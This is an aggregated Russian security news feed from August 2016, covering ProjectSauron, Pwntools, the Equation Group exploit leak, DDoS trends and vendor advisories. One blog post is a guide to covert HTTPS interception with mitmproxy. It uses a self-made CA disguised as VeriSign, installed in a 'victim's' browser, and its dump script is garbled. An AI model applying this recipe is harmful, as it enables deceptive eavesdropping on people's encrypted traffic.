    изделие «Персональное средство электронной подписи «Криптотокен ЭП» (исполнения 1, 2) в комплектации согласно формуляру 46538383.50 1430 007-01 30 01-1, предназначенное для использования совместно со Средством криптографической защиты информации «Криптотокен» в составе изделия «JaCarta ГОСТ» («eToken ГОСТ»)

    у других сертифицировано либо целиком устройство либо микросхема, а что сертифицируют в Аладдин Р.Д. — знают, видимо, только они сами, но публично рассказывать не спешат.

    Не исключаю, что в таблице есть неточности, готов при выявлении таковых по запросу их исправить. Сама таблица доступна на SlideShare и может быть скачана в виде PDF по прямой ссылке: http://zlonov.ru/download/token-gost.pdf

    Поделиться:

    orig: 2016-08-24 09:43:26 / http://feedproxy.google.com/~r/zlonov/~3/lNKfM4DdwY8/ (click post title)



    Добро пожаловать в проект «Саурон»

    Добро пожаловать в проект «Саурон»

    http://www.pcweek.ru/security/blog/security/8867.php

    Исследователи в области безопасности объявили об обнаружении вредоносного ПО, которое скрытно работало по меньшей мере пять лет!
    По словам экспертов «ProjectSauron» настолько сложен и хорошо разработан, что скорее всего за ним скрывается группа разработчиков, поддерживаемая правительством какой-то страны.
    Вредоносное ПО активно работало по крайней мере с 2011 года и предназначалось для заражения сетей в России, Китае, Швеции и других странах.
    Исследователи из компаний Symantec и Kaspersky Lab совместными усилиями обнаружили данное вредоносное ПО на более чем 30 сайтах, включая авиакомпанию в Китае, посольство в Бельгии и неопознанную организацию в Швеции.
    В отличие от потребительского вредоносного ПО, целью которого являются обычные пользовательские ПК, «ProjectSauron», также иногда называемый Remsec, предназначен для заражения правительственных сетей, военных объектов, центров научных исследований и корпоративных ИТ-систем.
    С помощью данного ПО злоумышленники шпионили за зараженными сетями, регистрируя нажатия клавиш, воруя персональные данные и пароли, открывая «черный ход» на зараженные системы.

    Название ProjectSauron происходит от ссылки в коде вредоносного программного обеспечения (см. изображение выше).
    Одной из причин, почему обнаружение данного ПО заняло столько времени – программа разработана таким образом, что использует уникальный код для каждой атаки.
    Хорошей новостью является то, что специалисты Kaspersky Lab считают, что действие ProjectSauron, кажется, прекратилось в этом году, однако нет никакой гарантии, что этот проект не будет возобновлен.
    Команды специалистов считают, что за настолько сложной вредоносной платформой стоит некое правительство, ведь такая работа предполагает длительную подготовку и планирование.
    ProjectSauron, скорее всего, потребовал нескольких команд специалистов и бюджета, исчисляемого миллионами долларов. На сегодня известно о том, что нападению подверглись более 30 организаций, однако, скорее всего это — просто крошечная верхушка айсберга, поясняет Kaspersky Lab.

    Share this:Понравилось это:

    Нравится Загрузка...

    Связанные Навигация по записям « Previous Post

    orig: 2016-08-24 09:40:06 / https://bezmaly.wordpress.com/2016/08/24/sauron/ (click post title)



    Q&A: Chuck Cobb, Magnet Forensics' New VP Of Training

    Wednesday, August 24, 2016 (09:08:32)

    Q&A: Chuck Cobb, Magnet Forensics' New VP Of Training

    We all know the forensics industry needs to be credible and reliable to have its necessary impact in the courtroom. Magnet Forensics recently launched an expanded training program and its first certification – the Magnet Certified Forensic Examiner (MCFE). To build an industry-leading training program, Magnet Forensics brought Chuck Cobb on board as Vice President, Training. We took a minute to sit down with Chuck and learn what it takes to build a top notch training and certification program.

    Read more

    orig: 2016-08-24 09:08:32 / http://www.forensicfocus.com/News/article/sid=2719/ (click post title)



    Согласны ли специалисты по управлению документами с тем, что открытые государственные данные – отличная штука?


    Заметка участника проекта InterPARES Trust Кэтрин Чорли (Katherine Chorley) из Университетского колледжа Лондона (University College London, UCL – в настоящее время это один из ведущих мировых центров исследования в области управления документами и архивного дела – Н.Х.) была опубликована на новом блоге проекта 17 августа 2016 года.

    С апреля этого года я участвовала в исследовании, проводимом Европейской   группой международного проекта  проведенного InterPARES Trust, в котором изучается воздействие программы открытых государственных данных на практику и профессию управления документами в государственном секторе Великобритании. В ходе исследования изучается опыт одного из больничных управлений (Hospital Trust) Национальной службы здравоохранения (National Health Service,  NHS). Оно опирается на результаты предыдущих проектов Европейской группы (EU03 и EU19) и сфокусировано на том, как среда «открытого правительства» оказывает влияние на местном уровне.

    Цель исследования заключается в выявлении проблем, связанных с опережающей публикацией данных в среде «открытого правительства», спектр которых варьируются от технических сложностей типа отсутствия портала для распространения данных, и до более практических вопросов повседневного управления открытыми государственными данными, с точки зрения как времени, так и ресурсов.

    Данные для анализа собирались посредством собеседований со специалистов по управлению документами из структуры NHS. Эти данные были дополнены данными опроса, проведенного путем анкетирования членов специализированной профессиональной группы  - «Группы по медицинским архивам и документам» (Health Archives and Records Group, http://healtharchives.co.uk/ ), с тем, чтобы можно было сопоставить итоги изучения конкретной структуры и то, что происходит в других аналогичных ситуациях. Я также присутствовала на одной из встреч членов этой группы, с целью дальнейшего обсуждения прогресса и последствий программы «открытого правительства» в сфере управления медицинскими документами, что оказалось весьма полезным и позволило лучше понять отношение профессионалов к открытым данным.

    Исследование показало, что, несмотря на усилия английского отделения NHS в вопросе прозрачности и подотчетности, в рамках которых открытые данные позиционируются как ключевой фактор, способствующий открытости, - на местном уровне эта политика не трансформируется в практику. В изучавшемся управлении NHS отсутствуют политика и соответствующая практика в вопросе открытых государственных данных. Помимо упомянутых выше проблем, специалисты по управлению документами также выразили свою обеспокоенность тем, что отсутствует организационная поддержка, да и вообще интерес к инициативе «открытого правительства».

    И хотя респонденты признавали ценность открытых государственных данных для исследовательских целей, было очевидно, что они сдержанно относятся к идее публикации наборов данных. Отчасти это может быть связано с перечисленными выше проблемами, но также отчасти и с отсутствием указаний относительно того, какая информация должна публиковаться, и с неопределенностью с тем, где и как эти данные будут использоваться. Публичная критика, которой NHS подверглась в связи с провалом программы коллективного использования данных Care.data, также накладывает отпечаток на любые попытки публикации данных для бесплатного общественного пользования и повторного использования.

    Результаты исследования позволили сформулировать ряд предложений относительно будущего открытых государственных данных в сфере управления документами, с упором на профессиональное внимание к тем различным аспектам открытых государственных данных, где мы можем внести свой вклад, таким, как обеспечение целостности и точности данных, а также к выполнению пилотных проектов, которые могли бы помочь в определении направлений дальнейшего развития программы открытых данных в рамках NHS.

    Кэтрин Чорли (Katherine Chorley)

    Мой комментарий: Меня больше всего огорчает то, что многие представители академической науки, даже из числа лучших, легко «покупаются» на политическую демагогию, которую разводили и продолжают разводить вокруг «открытых данных».

    Полностью игнорируются такие ключевые вопросы, как естественная интеграция открытых данных в деловые процессы организаций таким образом, чтобы эти наборы данных формировались в ходе повседневной деловой деятельности и в первую очередь были полезны своим владельцам (многочисленные попытки принудить организации делать дополнительную трудоёмкую и требующую ресурсов работу, которая для них самих ничего не дает, а часто и подвергает дополнительным рискам, благополучно провалились, и будут гарантированно проваливаться и в дальнейшем) – или как вопросы информационной безопасности и защиты персональных данных, особенно в условиях, когда активно развиваются инструменты деловой аналитики, «больших данных» и им подобные, позволяющие «выуживать» из наборов данных конфиденциальную информацию.

    Кстати говоря, любопытно, что будет в мире с инициативами «открытых данных», если в США Демократическая партия проиграет выборы – напомню, что в своё время именно представляющий её президент Обама дал толчок этому движению. В аналогичной ситуации с приходом Обамы его администрация постарались поскорее «забыть» термин «электронное правительство», о котором любила поговорить предшествующая республиканская администрация :)

    Источник: блог проекта InterPARES Trust
    https://interparestrustblog.wordpress.com/2016/08/17/open-government-data-is-great-do-records-managers-agree/

    orig: 2016-08-24 08:00:11 / http://rusrim.blogspot.com/2016/08/blog-post_52.html (click post title)



    Разработчики Pwntools представили третью версию хакерского инструмента

    Библиотека позволяет облегчить разработку эксплоитов для проведения тестов на проникновение и CTF-соревнований.

    Команда разработчиков Pwntools выпустила крупное обновление библиотеки, включающее ряд дополнительных модулей и новый функционал для взлома ОС Android.

    Pwntools представляет собой библиотеку/фреймворк на Python, предназначенную для облегченной разработки эксплоитов для проведения тестов на проникновение и CTF-соревнований. По словам одного из создателей платформы Зака Риддла (Zach Riddle), в будущем планируется поддержка версии Python 3, однако сроки выпуска обновления разработчик не сообщил.

    Наиболее эффективно библиотека работает на 64-битных версиях Ubuntu 12.04 и 14.04, но могут использоваться и другие дистрибутивы (Debian, Arch, FreeBSD, OSX и пр.). Требуется поддержка Python 2.7.

    Ранее команда студентов из Калифорнийского университета в Санта-Барбаре опубликовала на GitHub исходный код инструмента Mechanical Phish, предназначенного для автоматического поиска и устранения уязвимостей. В начале августа исследователи компании FireEye представили утилиту для динамического анализа поведения вредоносного ПО. 

    orig: 2016-08-24 07:53:07 / http://www.securitylab.ru/news/483489.php (click post title)



    Релиз среды разработки приложений KDevelop 5.0

    Состоялся релиз интегрированной среды программирования KDevelop 5.0, основанной на библиотеках KDE/Qt и полностью поддерживающей процесс разработки для KDE. Ключевыми особенностями новой ветки является портирование компонентов KDevelop для работы с KDE Frameworks 5 и Qt 5, а также поддержка Clang. Код проекта распространяется под лицензией GPL.

    orig: 2016-08-24 07:31:01 / http://www.opennet.ru/opennews/art.shtml?num=45022 (click post title)



    Links for 2016-08-23 [del.icio.us]

    orig: 2016-08-24 07:00:00 / http://feedproxy.google.com/~r/AntonChuvakinPersonalBlog/~3/bsV1n13hMXw/anton18 (click post title)



    SSL MITM с помощью mitmdump/mitmproxy

    Burp классная штука, но есть у него один косяк. В Burp нельзя поменять HTTPS сертификат, что является серьезным демаскирующим признаком. Я пробовал подменять файлик burpsuite_free.zip\resources\Crypto\ps.p12, но не сработало.

    Тулза mitmdump/mitmproxy из комплекта Kali linux поэтому выглядит гораздо более привлекательным решением, если вам нужно скрытно подампить https.

    Далее небольшой гайд.

    Генерируем правильный сертификат openssl genrsa -out CA.key
    openssl req -new -key CA.key -x509 -days 1095 -out CA.crt

    На вопросы openssl ответить можно, например, так:
    C = US
    O = VeriSign, Inc.
    OU = (c) 2006 VeriSign, Inc. - For authorized use only
    CN = VeriSign Class 3 Public Primary Certification Authority - G5

    Чтобы сделать сертификат в формате pem, который понимает mitmproxy, достаточно выполнить:
    cat CA.crt CA.key > CA.pem

    .crt файл необходимо установить в браузер жертвы.
    pem файл переместить в каталог .mitmproxy и заменить mitmproxy-ca.pem

    Теперь сертификат будет выглядеть намного посимпатичней.

    Но проблема с mitmproxy в другом. Она использует уникальный формат дампа, который не совместим более ни с чем. Работаем с дампом mitmproxy

    РазGREPать дамп mitmproxy - это боль главным образом из-за наличия gzip'нутого HTML. Нет импорта в tcpdump/wireshark (ибо mitmproxy не хватает IP заголовки), нет импорта в curl, нет вообще импорта!

    Более менее нормально работать с дампом можно только с помощью Python. 

    Я набросал скрипт (на базе read_dumpfile отсюда), который выводит разжатый http response body, который дальше можно читать grep'ом и пр. Может, кому пригодится.

    #!/usr/bin/env python

    #

    # Get ungzipped http response body

    # run: python readdump.py dumpfile

    #

    from libmproxy import flow

    import zlib

    import sys

    with open(sys.argv[1], "rb") as logfile:

      freader = flow.FlowReader(logfile)

    for f in freader.stream():
       try: 

      body = f.response.body
              print(zlib.decompress(body, 31))

            print("===================================")
       except:

    print("Error")  

    To do на след.раз: сгенерировать максимально похожую копию какого-нибудь trusted root CA так, чтобы даже fingerprint был визуально похож на реальный. Кто-нибудь случайно не знает утилиту, которая это может?

    orig: 2016-08-24 06:51:19 / http://www.itsec.pro/2016/08/ssl-mitm-mitmdumpmitmproxy.html (click post title)



    Ученые разработали микросхему для обнаружения аппаратных закладок в процессорах

    Интегральная схема предназначена для постоянного сканирования центрального процессора на предмет ошибок.

    Ученые Инженерной школы Тэндона при Нью-Йоркском университете (NYU Tandon School of Engineering) разработали интегральную схему специального назначения (ASIC), предназначенную для обнаружения скрытых уязвимостей в процессорах.

    В настоящее время очень немногие производители могут похвастаться собственными мощностями для производства чипов. Как правило, процессоры разрабатываются одной компанией, а производством занимается другая, обладающая всем необходимым дорогостоящим оборудованием. Проблема заключается в том, что эта компания может внести изменения в архитектуру процессора (добавить аппаратную закладку), сделав его уязвимым к хакерским атакам.

    Разработанная учеными интегральная схема предназначена для постоянного сканирования центрального процессора на предмет ошибок, сигнализирующих о наличии трояна. Безусловно, производитель ASIC должен быть полностью доверенным.

    «В настоящее время система работает таким образом, что я могу получить от производителя чип со встроенным трояном. Послепроизводственное тестирование может не выявить его, и я отправлю процессор клиентам, – пояснил доцент кафедры электрической и компьютерной инженерии Сиддхартх Гарг (Siddharth Garg). – Однако через два года он начнет работать неправильно. Благодаря нашей разработке я могу не полагаться на чип. Обрабатывая входящие данные, он производит исходящие, а также доказательства корректности. Внешний модуль позволит мне каждый раз проверять эти доказательства».

    Напомним, ранее метод для обнаружения аппаратных закладок также представили исследователи из Калифорнийского университета в Сан-Диего и Северо-Западного политехнического университета.  

    orig: 2016-08-24 06:48:37 / http://www.securitylab.ru/news/483485.php (click post title)



    В Индии хакеры украли данные о субмаринах Scorpene

    Утечка секретных документов о подводных лодках класса Scorpene, строящихся в Индии при участии Франции, могла стать результатом хакерской атаки, заявил глава индийского минобороны Манохар Паррикар.

    Накануне французская государственная компания военного кораблестроения DCNS заявила об утечке секретных документов о шести подводных лодках класса Scorpene, строящихся в Индии. Документ, который попал в распоряжение издания Australian, насчитывает 22,4 тысячи страниц, они описывают коммуникационные системы субмарин, подводные и надводные датчики, системы боевого управления, навигационные системы и систему пуска торпед, сообщает ria.ru.

    Паррикар заявил в среду, что поручил главе ВМС страны адмиралу Сунилу Ланбе проанализировать, какая конкретно информация была обнародована. По его словам, минобороны пока не владеет полной картиной случившегося, но, скорее всего, речь идет не о "стопроцентной утечке", а о хакерской атаке.

     

     

    "Как я понимаю, я узнал об этом только около полуночи, имел место взлом. Мы установим все эти аспекты. Я сказал главе ВМС установить все эти детали. Может быть, через пару дней я поделюсь ими с вами", — заявил Паррикар журналистам.

    Проект по строительству шести субмарин класса Scorpene в Индии проходит при участии французской компании DCNS, контракт предусматривает передачу технологий индийской стороне. Первая построенная в Индии подлодка Scorpene прошла ходовые испытания в мае. Также DCNS строит подводные лодки нового поколения для Австралии. Модификации субмарин этого класса используются ВМС Малайзии, Чили, Бразилия также планирует закупить эти французские подлодки.

    orig: 2016-08-24 06:39:36 / https://www.anti-malware.ru/news/2016-08-24/20763 (click post title)



    The New York Times атаковали хакеры

    Хакеры атаковали московское бюро The New York Times, сообщила газета. Ранее CNN написал, что издание и ряд других американских СМИ подверглись кибератаке, за которыми, по данным следствия, стоит российская разведка.

    Целью хакерской атаки было московское бюро The New York Times (NYT), говорится в сообщении на сайте газеты.

    В нем отмечается, что в настоящее время нет данных о том, что хакеры, которых считают российскими, добились успеха. «Мы постоянно мониторим наши системы и не увидели свидетельств того, что наши внутренние системы, включая системы московского бюро, были взломаны», — сообщила официальный представитель газеты Эйлин Мерфи.

    Внешние фирмы для расследования попытки взлома не нанимались, отметила Мерфи.

    Правительственный источник сообщил, что ФБР расследует попытку атаки на NYT. Однако больше подобных расследований, касающихся новостных организаций, не проводится, уточнил он.

    Официальный представитель ФБР Келли Ленгмессер не стала комментировать произошедшее.

    О кибератаках на The New York Times и другие американские издания, расследуемых ФБР и другими спецслужбами США, ранее сообщил CNN со ссылкой на осведомленные источники. Следствие полагает, что атаки совершили хакеры, за которыми стоит российская разведка, а сами взломы стали частью более широкой серии атак, нацеленных в том числе на демпартию США, утверждали собеседники телеканала, пишет rbc.ru.

    Ранее серию кибератак совершили на структуры, связанные с Демократической партией США: первую — на национальный комитет демократов, вторую — на фандрайзинговый комитет, поддерживающий кандидатов в конгресс США от демпартии, и третью — на предвыборный штаб кандидата в президенты Хиллари Клинтон.

    The New York Times опубликовала ряд материалов, связанных с кибератаками, где сообщала, что за взломами стоит Россия. В частности, со ссылкой на сотрудников нескольких фирм в области компьютерной безопасности газета писала, что в кибератаке на национальный комитет демпартии обнаружен «российский след». Позже NYT со ссылкой на федеральные источники написала, что, как сообщили американские спецслужбы Белому дому, с «высокой долей вероятности» за взломом почты демократов стоят российские власти.

    Представители демократов также возложили ответственность за взлом серверов на Россию. В частности, кандидат в президенты США от демпартии Хиллари Клинтон заявляла, что серверы взломали российские спецслужбы.

    ​В Кремле обвинения отвергали. Пресс-секретарь президента России Дмитрий Песков, в частности, говорил, что «российские официальные ведомства <...> никогда не занимаются кибертерроризмом».

    orig: 2016-08-24 06:36:58 / https://www.anti-malware.ru/news/2016-08-24/20762 (click post title)



    WikiLeaks раскрывает персональные данные невинных граждан

    Опубликованные на сайте документы содержат сведения о жертвах насилия, психически больных и должниках.

    Основатель WikiLeaks Джулиан Ассанж уже несколько лет находится в вынужденном заточении в посольстве Эквадора в Лондоне, однако его детище продолжает работать. Тем не менее, на сайте публикуются не только секретные документы, проливающие свет на «темные дела» правительств стран мира. Как сообщает Associated Press, среди выложенной на ресурсе информации можно найти конфиденциальные данные жертв сексуального насилия и людей с психическими заболеваниями.

    «Они опубликовали все: мой номер телефона, домашний адрес, имя и другие подробности, – сообщил житель Саудовской Аравии, чей судебный спор об установлении отцовства оказался опубликованным на WikiLeaks. – Если бы семья моей жены это увидела… Публикация такой персональной информации, как эта, может разрушить жизни людей».  

    Дамп дипломатических документов Саудовской Аравии содержит по крайней мере 124 файла с медицинскими записями. В них указаны имена больных детей, беженцев и людей с психическими заболеваниями. В одном документе даже содержится информация о жителе Саудовской Аравии, арестованного за гомосексуализм (в Саудовской Аравии гомосексуализм карается смертной казнью). Еще в двух файлах указываются имена подростков, ставших жертвами сексуального насилия. Кроме того, дамп содержит информацию о денежных задолженностях простых граждан и даже информацию о партнерах ВИЧ-инфицированных женщин.

    В ходе анализа, проведенного AP совместно с компанией DataGravity, были обнаружены более двух десятком номеров социального страхования и кредитных карт. По словам двоих человек (один из них – дипломат США на пенсии), после публикации этих данных на WikiLeaks они стали жертвами кражи личности.   

    Журналисты AP попытались связаться с Джулианом Ассанжем, но безуспешно, а вопросы, отправленные администрации сайта, остались без ответа.

    На заре своего существования WikiLeaks тесно сотрудничал с журналистами The New York Times и The Guardian, опубликовавшими документы, которые предоставила бывшая военнослужащая США Челси Мэннинг (Chelsea Manning) в 2010 году. Однако со временем отношения Ассанжа со многими журналистами испортились, и бывшие соратники стали критиковать его действия. К примеру, после публикации документов Демократической партии США Эдвард Сноуден заявил в Twitter: «Сейчас демократизация информации важна как никогда и WikiLeaks сыграл в этом большую роль, но их упорный отказ от хотя бы минимальной модерации – это ошибка».  

    Напомним, недавно ИБ-эксперт Веселин Бончев также обнаружил в опубликованном на WikiLeaks дампе электронных писем несколько сотен образцов вредоносного ПО. 

    orig: 2016-08-24 05:57:59 / http://www.securitylab.ru/news/483484.php (click post title)



    Венгерские исследователи «обновили» эксплоит Equation Group для уязвимостей в Cisco ASA

    Сейчас инструмент ExtraBacon работает на более новых версиях Cisco ASA, включая 9.2.(4).

    Специалисты из венгерской компании SilentSignal провели апгрейд одного из эксплоитов из арсенала хакерский группировки Equation Group. Речь идет об инструменте ExtraBacon, предназначенном для эксплуатации уязвимостей в серии аппаратных межсетевых экранов Cisco Adaptive Security Appliance (ASA). Если раньше работоспособность эксплоита была ограничена Cisco ASA 8.4.(4) и ниже, то сейчас он работает на более новых версиях, включая 9.2.(4).

    Ранее компания Cisco уже подтвердила подлинность двух эксплоитов из архива, опубликованного группировкой The Shadow Brokers. Напомним, на прошлой неделе хакеры заявили, что им удалось взломать системы команды Equation Group, предположительно связанной с Агентством национальной безопасности США. В качестве доказательства участники The Shadow Brokers разместили фрагмент похищенного массива данных (порядка 300 файлов) в открытом доступе, а вторую часть выставили на продажу, установив цену в 1 млн биткойнов.

    Производитель телекоммуникационного оборудования Juniper Networks также подтвердил работоспособность нескольких эксплоитов - FEEDTROUGH и ZESTYLEAK. По словам представителя компании Деррика Шолла (Derrick Scholl), инструменты предназначены для эксплуатации уязвимостей в межсетевых экранах Juniper NetScreen под управлением ОС ScreenOS.

    «В ходе анализа этих [Equation Group] файлов, мы обнаружили эксплоит для устройств NetScreen под управлением ScreenOS. В настоящее время мы проводим проверку масштабов атаки, однако предварительный анализ показал, что она затрагивает загрузчик операционной системы, но не эксплуатирует уязвимости в ScreenOS», - отметил Шолл в официальном сообщении. 

     

    orig: 2016-08-24 05:36:18 / http://www.securitylab.ru/news/483483.php (click post title)



    ФБР расследует возможные атаки на московское бюро The New York Times

    В причастности к инциденту подозреваются хакеры, связанные с российскими спецслужбами.

    ФБР США проводит расследование кибератаки на сайт московского бюро издания The New York Times. В причастности к инциденту подозреваются хакеры, связанные с российскими спецслужбами. В настоящее время нет доказательств, что попытка взлома, осуществленная ранее в этом месяце, оказалась успешной.

    «Мы постоянно проводим мониторинг наших сетей, используя самые современные инструменты. Мы не нашли свидетельств, что наши внутренние системы, включая сеть московского бюро, были взломаны или скомпрометированы», - сообщила представитель The New York Times Эйлин Мерфи (Eileen Murphy).

    О попытках хакеров взломать новостной ресурс стало известно спустя два месяца после окончания частного расследования атаки на серверы Национального комитета Демократической партии США.

    Пока администрация президента Обамы официально не обвиняла российские власти в причастности ко взлому НКДП, хотя высшие чины в американских спецслужбах согласны во мнении, что атака – дело рук ФСБ и ГРУ.

    По словам чиновников администрации, как только расследование будет завершено, президент Обама примет решение о целесообразности ответной реакции. Она может выразиться в форме неофициального предупреждения, экономических санкций или контратаки какого-либо рода, отмечает The New York Times.

    orig: 2016-08-24 04:45:14 / http://www.securitylab.ru/news/483482.php (click post title)



    VMware Security Advisory 2016-0013

    VMware Security Advisory 2016-0013 - VMware Identity Manager and vRealize Automation updates address multiple security issues.

    orig: 2016-08-24 03:06:25 / https://packetstormsecurity.com/files/138484/VMSA-2016-0013.txt (click post title)



    Red Hat Security Advisory 2016-1664-01

    Red Hat Security Advisory 2016-1664-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix: It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network.

    orig: 2016-08-24 03:05:38 / https://packetstormsecurity.com/files/138483/RHSA-2016-1664-01.txt (click post title)



    Red Hat Security Advisory 2016-1657-01

    Red Hat Security Advisory 2016-1657-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix: A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialised variable would eventually lead to arbitrary free address which could allow attacker to use a use-after-free style attack. A flaw was found in the way certain interfaces of the Linux kernel's Infiniband subsystem used write() as bi-directional ioctl() replacement, which could lead to insufficient memory security checks when being invoked using the splice() system call. A local unprivileged user on a system with either Infiniband hardware present or RDMA Userspace Connection Manager Access module explicitly loaded, could use this flaw to escalate their privileges on the system.

    orig: 2016-08-24 03:05:31 / https://packetstormsecurity.com/files/138482/RHSA-2016-1657-01.txt (click post title)



    DDoS-атаки ставят рекорды. Как быстро и дешево защитить свой бизнес?

    В среднем активность DDoS-атак выросла чуть менее, чем вдвое, если сравнивать показатели год к году, а пик мощности атаки почти достиг 600 Гбит/с.

    Введение
    По данным компаний Akamai и Arbor Networks в первом квартале 2016-ого года был зафиксирован рекорд по количеству мощных DDoS-атак — 19, мощность каждой превысила 100 Гбит/с. В среднем активность DDoS-атак выросла чуть менее, чем вдвое, если сравнивать показатели год к году, а пик мощности атаки почти достиг 600 Гбит/с.

    Аналитики отрасли говорят о том, что ситуация ухудшается и положительной динамики ожидать не приходится. Сегодня все шире распространяются бесплатные или недорогие онлайн-сервисы, которые позволяют легко и быстро организовать DDoS-атаку. Широко известен LizardStresser от хакерской группы Lizard Squad. На его основе построен не один десяток ботнетов. При том, что хакеры усиливают свои мощности, большинство интернет-ресурсов «ложится» от самой простой атаки,
    не превышающей по мощности и 1 Гбит/с.

    Методы атак при этом известны. Хакеры используют особенности сетевых протоколов. С помощью чужих серверов организуется атака на жертву, которая забивает канал связи и уводит его в оффлайн. Наиболее популярный метод – DNS-усиление, доля которого составляет почти 1/5 от всех атак. За ними идут NTP-, CHARGEN- и SSDP-усиление. Более половины атак при этом сочетают в себе все эти методы, не оставляя жертве практически никаких шансов для отражения атаки. Единственной позитивной динамикой обладает время атак – он в среднем сократилось на 1/3 по сравнению с 2015-ым годом. Эти рекордные показатели, как по количеству, так и по мощности все больше беспокоят владельцев бизнеса, которые зависят от интернет-ресурсов.

    Именно поэтому набирает популярность аналитическая DDoS-защита.

    Как организовать защиту от DDoS-атак
    Организовать качественную DDoS-защиту в рамках собственной инфраструктуры может позволить себе далеко не каждый бизнес, тем более малый. Это затраты и прямые, и косвенные (на поиск квалифицированных кадров). Именно поэтому бизнес все чаще обращается к провайдерам защиты от DDoS-атак и отдает эту функцию на аутсорс.

    К примеру, наша компания RUVDS предлагает клиентам аналитическую защиту от DDoS-атак по цене, за которую вы не сможете даже провести собеседование потенциального сотрудника.

    Виды атак
    Приведем список потенциальных типов атак и их классификацию.Переполнение канала:
    Атаки на уязвимость сетевых протоколов:
    Атаки на уровне приложений:

    Как видите, угроз немало, а сам список не окончательный. Однако 99% атак, которые происходят каждый день, подпадают под данную классификацию, а значит, их можно отразить.

    Что представляет собой данная защита от подобных атак?
    Провайдер помещает IP адрес, который клиент выбрал в качестве защищаемого, в специальную сеть-анализатор. При атаке производится сопоставление трафика, идущего к клиенту, по отношению к известным шаблонам атак. В итоге клиенту доходит уже чистый, отфильтрованный трафик, таким образом, что пользователи ресурса и не узнают, что была предпринята атака.

    Для организации такого сервиса в первую очередь создается гео-распределенная сеть фильтрующих узлов так, чтобы для каждой атаки можно было выбрать наиболее близкий узел и минимизировать задержку в передаче трафика для конечного клиента. Емкость подобной сети превышает 1500 Гбит/с.

    Сначала в борьбу вступают аппаратные средства защиты – производится анализ сигнатуры, статистики и поведения, проверяется соблюдения требований используемых трафиком протоколов (суть уровень защиты L2, L3, L4).

    После этого начинается более тонкая аналитическая работа на уровнях L5-L7. Система производит интеллектуальную фильтрацию, проводится анализ атак на протоколы HTTP, HTTPS, поведенческий и корреляционный анализ.

    Принимая во внимание список самих атак, эти три этапа защиты превращаются в неподъемную задач для рядового владельца интернет-ресурса.

    Что делать? Выход из данной ситуации есть – переход в облако. Так как основной бизнес провайдера облачной инфраструктуры – информация, он уже позаботился о ее защите, начиная от надежности связи и антивирусах, заканчивая DDoS-защитой себя и своих клиентов. Именно это позволяет провайдеру оказывать услуги по защите по минимальной цене, ведь он, с одной стороны, уже вложился в ее организацию и стремится окупить затраты, с другой стороны знает, что если цена не будет конкурентной, он потеряет клиента по своему основному бизнесу – аренде виртуальных серверов. То есть здесь мы видим полное совпадение интересов клиента и провайдера. А значит в данном случае это наиболее выгодный и правильный метод защиты вашего интернет-ресурса от большинства видов атак.

    Судите сами, всего за 400 рублей в месяц можно спать спокойно и забыть о хакерах. Это ли не прекрасно?

    orig: 2016-08-24 00:47:00 / http://www.securitylab.ru/analytics/483481.php (click post title)



    Сведения о нотариальных доверенностях будут доступны через Интернет


    В настоящее время как в деловой деятельности, так и государственном управлении у нас широко используются доверенности. Федеральный закон от 3 июля 2016 года № 332-ФЗ «О внесении изменений в статьи 188 и 189 части первой Гражданского кодекса Российской Федерации и в Основы законодательства Российской Федерации о нотариате» уточнил ряд положений, связанных с их отзывом.

    В части первой Гражданского кодекса РФ в статье 188 «Прекращение доверенности» сейчас установлено, что действие доверенности прекращается вследствие ее отмены выдавшим ее лицом, или одним из лиц, выдавших ее совместно. Эти положения уточнены словами о том, что «при этом отмена доверенности совершается в той же форме, в которой была выдана доверенность, либо в нотариальной форме».

    В статье 189 «Последствия прекращения доверенности» уточнено, что сведения о совершенной в нотариальной форме отмене доверенности вносятся нотариусом в реестр нотариальных действий, ведение которого осуществляется в электронной форме, в порядке, установленном законодательством о нотариате. Указанные сведения предоставляются Федеральной нотариальной палатой неограниченному кругу лиц через Интернет.

    Мой комментарий: Сейчас законодательством возможность отмены простой доверенности у нотариуса не предусмотрена.

    Если третьи лица не были извещены об отмене доверенности ранее, они считаются извещенными о совершенной в нотариальной форме отмене доверенности на следующий день после внесения сведений об этом в реестр нотариальных действий.

    В Основах законодательства Российской Федерации о нотариате от 11 февраля 1993 года № 4462-1 в статье 34.4 «Предоставление сведений, содержащихся в единой информационной системе нотариата» установлено, что с 1 января 2017 года Федеральная нотариальная палата обеспечивает с использованием сети «Интернет» ежедневно и круглосуточно свободный и прямой доступ неограниченного круга лиц без взимания платы к содержащимся в единой информационной системе нотариата сведениям:

    Мой комментарий: Ранее предоставлялись сведения об отмене доверенности и сведения реестра уведомлений о залоге движимого имущества.

    Одновременно уточнен порядок представления Федеральной нотариальной палатой сведений из реестра нотариальных действий единой информационной системы нотариата:
    Мой комментарий: В отдельную группу получателей информации выделены органы, предоставляющие муниципальные и государственные услуги и исполняющие государственные и муниципальные функцию.

    Одновременно закон № 332-ФЗ установил, что (ст. 3):
    Источник: Консультант Плюс
    http://base.consultant.ru/cons/cgi/online.cgi?req=doc&base=LAW&n=200718

    orig: 2016-08-23 21:05:01 / http://rusrim.blogspot.com/2016/08/blog-post_24.html (click post title)



    [Slide|Video] Kelihos & Peter Severa; the "All Out" version

    Tag: Kelihos, Khelios, P2P, FastFlux, Botnet, CNC, C2, Clickfraud, Traffic Redirection, Spambot, DNS Poison, Botnet as Service, Affiliate, Severa, Peter Severa, Petrushakov, Saever


    Warning: It's a "hardcore" disclosure, read only if you need & ready to know..

    Background

    The "suspect" a.k.a. bad actor in the below slide is responsible for malware distribution via RedKit exploit kit [-1-] [-2-] [-3-], Cookie Bomb [-1-] [-2-] [-3-] [-4-], Malicious Cushion Redirectors [-1-] [-2-], and those all linked and lead to his botnet the Kelihos (aka Khelios aka Waledac) a fast flux botnet [-1-] [-2-] [-3-]. The actor is known with alias name "Petr/Peter Severa" [-1-] [-2-].

